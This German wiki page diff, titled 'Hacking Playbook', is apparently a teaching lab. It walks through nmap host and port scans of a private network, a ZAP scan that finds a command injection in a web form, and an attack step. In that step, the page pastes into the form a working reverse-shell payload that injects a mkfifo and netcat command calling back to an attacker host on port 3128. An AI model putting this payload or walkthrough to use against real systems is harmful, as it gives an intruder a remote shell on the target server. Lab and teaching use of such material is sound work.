Hacking Playbook: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 1: Zeile 1:
=Scan des Netzes=
+
*[[Schwachstellen Erkennung]]
*nmap -sP  10.0.5.0/24
 
<pre>                                           
 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-28 17:40 CEST
 
Nmap scan report for 10.0.5.1
 
Host is up (0.00047s latency).
 
Nmap scan report for 10.0.5.12
 
Host is up (0.0010s latency).
 
Nmap scan report for 10.0.5.21
 
Host is up (0.00085s latency).
 
Nmap scan report for 10.0.5.22
 
Host is up (0.00098s latency).
 
Nmap scan report for 10.0.5.104
 
Host is up (0.0014s latency).
 
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.78 seconds
 
</pre>
 
=Port Scan eines Rechners=
 
<pre>
 
nmap -sS  10.0.5.104
 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-28 17:44 CEST
 
Nmap scan report for 10.0.5.104
 
Host is up (0.0016s latency).
 
Not shown: 991 filtered ports
 
PORT    STATE  SERVICE
 
22/tcp  open  ssh
 
25/tcp  open  smtp
 
53/tcp  open  domain
 
80/tcp  open  http
 
143/tcp  open  imap
 
443/tcp  open  https
 
465/tcp  closed smtps
 
993/tcp  open  imaps
 
3128/tcp open  squid-http
 
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds
 
</pre>
 
=Wir scannen http etwas tiefer mit ZAP=
 
==Zap suchen==
 
[[Datei:Zap-11.png]]
 
==Automatischer Scan==
 
[[Datei:Zap-12.png]]
 
==IP eintragen und Attacke==
 
[[Datei:Zap-14.png]]
 
==Wir finden eine Command Injection==
 
[[Datei:Zap-15.png]]
 
 
=Angriff=
 
=Angriff=
 
==Remote Shell vorbereiten==
 
==Remote Shell vorbereiten==

Version vom 28. September 2022, 16:16 Uhr

Angriff

Remote Shell vorbereiten

Angriff-1.png

Öffnen der gefunden Schwachstellen Seite

Angriff-2.png

Das Eingabefeld

Angriff-3.png

Wir pasten unseren Hack

1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.55 3128 1>/tmp/backpipe

Angriff-4.png

Ja sind wir den schon drin?

Angriff-5.png